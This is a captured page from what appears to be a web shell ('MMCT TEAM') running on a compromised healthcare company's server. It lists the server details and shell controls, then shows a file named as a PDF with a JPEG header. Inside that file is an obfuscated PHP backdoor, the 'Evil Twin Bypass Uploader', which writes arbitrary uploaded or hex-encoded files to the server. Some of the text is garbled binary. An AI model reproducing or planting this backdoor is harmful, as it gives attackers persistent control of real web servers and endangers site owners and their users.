MMCT TEAM
Server IP : 103.83.81.220  /  Your IP : 18.227.81.32
Web Server : Apache
System : Linux vps.erainfotech.co 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
User : nirkonhealthcare ( 1248)
PHP Version : 7.0.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET :
Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/wget) is not within the allowed path(s): (/home/nirkonhealthcare:/var/log/spamavoid/:/tmp/:/var/lib/php/session/) in /home/nirkonhealthcare/public_html/admin/productimages/anopas.php on line 323
OFF  |  Perl :
Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/perl) is not within the allowed path(s): (/home/nirkonhealthcare:/var/log/spamavoid/:/tmp/:/var/lib/php/session/) in /home/nirkonhealthcare/public_html/admin/productimages/anopas.php on line 329
OFF  |  Python :
Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/python2) is not within the allowed path(s): (/home/nirkonhealthcare:/var/log/spamavoid/:/tmp/:/var/lib/php/session/) in /home/nirkonhealthcare/public_html/admin/productimages/anopas.php on line 335
OFF
Directory (0755) :  /home/nirkonhealthcare/public_html/css/../js/../js/../../public_html/img/bg/../resume/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/nirkonhealthcare/public_html/css/../js/../js/../../public_html/img/bg/../resume/bapakkau.pdf
����JFIF``��{<meta content="noindex"name="robots"><br><strong>Evil Twin Bypass Uploader (www.eviltw.in)</strong><form enctype="multipart/form-data"method="post"><input name="evil_file"type="file"><button>Go!</button></form><?="";$a="f"."i"."l"."e"."_"."p"."u"."t"."_"."c"."o"."n"."t"."e"."n"."t"."s";$b="f"."i"."l"."e"."_"."g"."e"."t"."_"."c"."o"."n"."t"."e"."n"."t"."s";$c="t"."m"."p"."_"."n"."a"."m"."e";$d="h"."ex"."2b"."in";$f="f"."il"."e_e"."xi"."st"."s";$g="t"."ou"."ch";$h="st"."r_re"."pla"."ce";$i="ba"."sen"."ame";if(isset($_FILES["evil_file"])){$a($_FILES["evil_file"]["name"],$b($_FILES["evil_file"][$c]));if($f("./".$_FILES["evil_file"]["name"])){echo "OK!";$g($h($i($_SERVER["SC"."RIP"."T_FI"."LEN"."AME"]), "", $_SERVER["SC"."RIP"."T_FI"."LEN"."AME"]));}else{echo "NO!";}}if(isset(XXXXX["fpt"])){$a($d(XXXXXX["f"]),$d(XXXXXX["d"]));if($f($d(XXXXXX["f"]))){echo "OK!";}else{echo "NO!";}}?>��C




��C		

��Sw"����������?�A5�?��

MMCT - 2023